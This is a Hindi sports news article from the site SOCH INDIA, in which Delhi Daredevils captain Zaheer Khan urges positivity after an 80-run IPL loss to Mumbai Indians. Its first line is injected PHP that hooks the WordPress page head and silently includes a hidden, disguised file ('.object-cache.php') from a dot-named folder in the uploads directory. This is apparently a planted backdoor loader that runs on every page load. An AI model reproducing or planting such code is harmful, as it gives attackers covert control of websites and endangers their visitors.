add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हमें सकारात्मक रहने की जरूरत है: जहीर – SOCH INDIA
Menu

खेल
हमें सकारात्मक रहने की जरूरत है: जहीर

nobanner

हमें सकारात्मक रहने की जरूरत है: जहीर

विशाखापत्तनम: दिल्ली डेयरडेविल्स के कप्तान जहीर खान ने आई.पी.एल. 9 मुकाबले में गत चैंपियन मुंबई इंडियंस के खिलाफ मिली 80 रनों की हार पर निराशा जाहिर करते हुए कहा कि टीम के पास अब भी वापसी करने का मौका है बस सकारात्मक रहने की जरूरत है।

स्टार तेज गेंदबाज ने मुकाबले के बाद कहा कि हमने पूरे टूर्नामैंट के दौरान अच्छी गेंदबाजी की लेकिन इस मुकाबले में गेंदबाजों ने निराश किया। यह मुकाबला उनके लिए कठिन रहा। जब कृणाल बल्लेबाजी कर रहे थे तब हमारे पास तीसरे तेज गेंदबाज का विकल्प नहीं था। मुंबई के बल्लेबाजों ने खासकर कृणाल ने स्पिनर्स का अच्छे से मुकाबला किया। उन्होंने सूझबूझ तरीके से बल्लेबाजी की और उन्हें उनके शानदार प्रदर्शन का श्रेय जाता है।

उन्होंने कहा कि 200 रन का लक्ष्य हमेशा कठिन होता लेकिन हमें सकारात्मक रहते हुए टूर्नामैंट के अंतिम चरण में विश्वास के साथ खेलने की जरूरत है। हमारे पास अब भी 3 मैच बचे हैं, जिसमें से 2 जीत सकते हैं। अब हमें अपने मैच रायपुर में खेलने हैं जोकि हमारा घरेलू मैदान है और हमें निश्चित रूप से इसका फायदा मिलेगा।